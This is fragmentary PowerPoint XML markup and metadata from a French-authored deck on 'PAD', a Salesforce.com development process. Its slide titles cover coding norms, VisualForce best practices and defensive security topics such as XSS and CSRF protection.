              <a:off x="2710" y="2650"/>
              <a:ext cx="0" cy="3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76" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="8839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 anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="39688" indent="-39688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fr-FR" sz="2000" b="1">
                <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;PAD Spec – Document structure 2/4 – For each development&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1">
              <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
              <a:sym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1938&quot;&gt;&lt;/object&gt;&lt;object type=&quot;2&quot; unique_id=&quot;11939&quot;&gt;&lt;object type=&quot;3&quot; unique_id=&quot;11940&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 15&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;257&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;12866&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 1 - &amp;quot;Platform-as-a-Service Overview&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;284&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;12867&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 8 - &amp;quot;Our Multi-Application, Multi-Category Strategy&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;285&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;12989&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 9 - &amp;quot;What Type of Apps Are a Good Fit for PaaS?&amp;#x0D;&amp;#x0A;Data and Process Centric Apps Are the Sweet Spot&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;287&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13146&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 10 - &amp;quot;What are Our Customers Building?&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;291&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13241&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 11&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;292&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13356&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 13 - &amp;quot;Why PaaS? -- What if all your resources could be focused on only what’s unique about your apps?&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;293&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13357&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 17&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;294&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13358&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 19&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;296&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13587&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 16&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;305&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13588&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 20&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;297&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13589&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 21&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;298&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13590&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 22 - &amp;quot;Fast and Flexible Solutions for Integration Success&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;302&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13591&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 26&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;299&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13592&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 27&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;300&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13593&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 28 - &amp;quot;Build Rich User Interfaces&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;306&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13594&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 31&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;301&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;13826&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 33 - &amp;quot;Thank You!&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;309&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14103&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 3 - &amp;quot;The Fastest Growing Software Company&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;313&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14104&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 7 - &amp;quot;Proven Enterprise Success&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;314&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14366&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 12 - &amp;quot;Electronic Arts Uses force.com for Global Talent Management&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;318&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14367&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 14 - &amp;quot;PaaS lets developers focus on what their apps do, rather than the software and infrastructure to run them &amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;319&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14368&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 23 - &amp;quot;Proven Integration Success with SAP &amp;#x0D;&amp;#x0A;Just a few of the SAP customers that have integrated with Salesforce &amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;315&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14369&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 24 - &amp;quot;Speed of Deployment and Integration with SAP at Dupont&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;316&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14370&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 25 - &amp;quot;Proven Success with Oracle &amp;#x0D;&amp;#x0A;Just a few of the Oracle customers that have integrated with Salesforce &amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;317&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14452&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 2&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;322&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14453&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 29 - &amp;quot;Previewing &amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;320&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14454&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 30 - &amp;quot;… How Does it Work?&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;321&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14635&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 4 - &amp;quot;Our Offerings: SaaS Applications and the World’s First Application Development Platform-as-a-Service (Paas)&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;327&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14636&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 5 - &amp;quot;Why is salesforce.com Unique?&amp;#x0D;&amp;#x0A;A technology &amp;amp; business model delivering 100% focus on customer success&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;323&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14638&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 18 - &amp;quot;Our Transparency Drives Trusted Accountability&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;325&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;14639&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 32 - &amp;quot;Next Steps&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;328&quot;/&gt;&lt;/object&gt;&lt;object type=&quot;3&quot; unique_id=&quot;15101&quot;&gt;&lt;property id=&quot;20148&quot; value=&quot;5&quot;/&gt;&lt;property id=&quot;20300&quot; value=&quot;Slide 6 - &amp;quot;Metadata: How Multi-Tenancy Works&amp;quot;&quot;/&gt;&lt;property id=&quot;20307&quot; value=&quot;330&quot;/&gt;&lt;/object&gt;&lt;/object&gt;&lt;/object&gt;&lt;/database&gt;"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1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27" charset="0"/>
            <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:sym typeface="Arial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27" charset="0"/>
            <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults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Blank Presentation">
  <a:themeElements>
    <a:clrScheme name="9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Blank Presentation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27" charset="0"/>
            <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:sym typeface="Arial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27" charset="0"/>
            <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
            <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="9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Powerpoint Template - December 2009</Template>
  <TotalTime>5102</TotalTime>
  <Words>7466</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (4:3)</PresentationFormat>
  <Paragraphs>1484</Paragraphs>
  <Slides>81</Slides>
  <Notes>65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4" baseType="lpstr">
      <vt:lpstr>4_Blank Presentation</vt:lpstr>
      <vt:lpstr>9_Blank Presentation</vt:lpstr>
      <vt:lpstr>Worksheet</vt:lpstr>
      <vt:lpstr>&lt;PAD&gt;  a Salesforce.com development process</vt:lpstr>
      <vt:lpstr>Consulting Challenges</vt:lpstr>
      <vt:lpstr>Project challenges</vt:lpstr>
      <vt:lpstr>&lt;PAD – Parallel Development&gt;</vt:lpstr>
      <vt:lpstr>Diapositive 5</vt:lpstr>
      <vt:lpstr>&lt;PAD/Spec Presentation &gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD Spec – introduction&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD Spec – Document structure 1/4 – Common Slides&gt;</vt:lpstr>
      <vt:lpstr>Diapositive 9</vt:lpstr>
      <vt:lpstr>Diapositive 10</vt:lpstr>
      <vt:lpstr>Diapositive 11</vt:lpstr>
      <vt:lpstr>&lt;PAD/DEV Presentation&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD Dev – Introduction&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD - Norms&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD - Naming Convention&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD – Developing&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD – Deactivation system and Framework&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD Class : Code&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD Component : Code&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD – Trigger Sample&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD – Class sample&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD Framework – detail&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD framework – programmatic bypass&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD framework – extension&gt;</vt:lpstr>
      <vt:lpstr>Diapositive 25</vt:lpstr>
      <vt:lpstr>Diapositive 26</vt:lpstr>
      <vt:lpstr>&lt;Using PAD Component with VisualForce 3/4&gt;</vt:lpstr>
      <vt:lpstr>Diapositive 28</vt:lpstr>
      <vt:lpstr>&lt;PAD&gt; related to the configuration</vt:lpstr>
      <vt:lpstr>&lt;PAD/DEV Best Practices &gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD - Governor Optimization&gt;</vt:lpstr>
      <vt:lpstr>&lt;Code review checklist&gt;</vt:lpstr>
      <vt:lpstr>&lt;Test methods&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Make it simple&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Keep your user updated&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - PAD&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Do’s 1/2&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Do’s 2/2&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Don’ts&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Wrapper class&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce – Security Best Practices&gt; </vt:lpstr>
      <vt:lpstr>&lt;VisualForce – XSS – What to avoid&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce – XSS – How to fix it?&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - SOQL Injection&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - How to safeguard from CSRF attacks&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Data Access control 1/2&gt;</vt:lpstr>
      <vt:lpstr>&lt;VisualForce - Data Access control 2/2&gt;</vt:lpstr>
      <vt:lpstr>&lt;PAD/Spec Sample1 &gt;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&lt;PAD/Spec Sample2 &gt;   Business Requirement from your customer  “I would like to be able to change the account on a opportunity, displaying a list of accounts from the same account hierarchy”   How would you specify this requirement for the developer ? </vt:lpstr>
      <vt:lpstr>&lt;Context&gt;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  <vt:lpstr>How to get latest PAD version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 Process</dc:title>
  <dc:creator>JLA - SBN</dc:creator>
  <cp:lastModifiedBy>ANTOINE Jean Luc (jantoine)</cp:lastModifiedBy>
  <cp:revision>492</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-09-06T01:27:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-11T20:27:19Z</dcterms:modified>
</cp:coreProperties>
</file>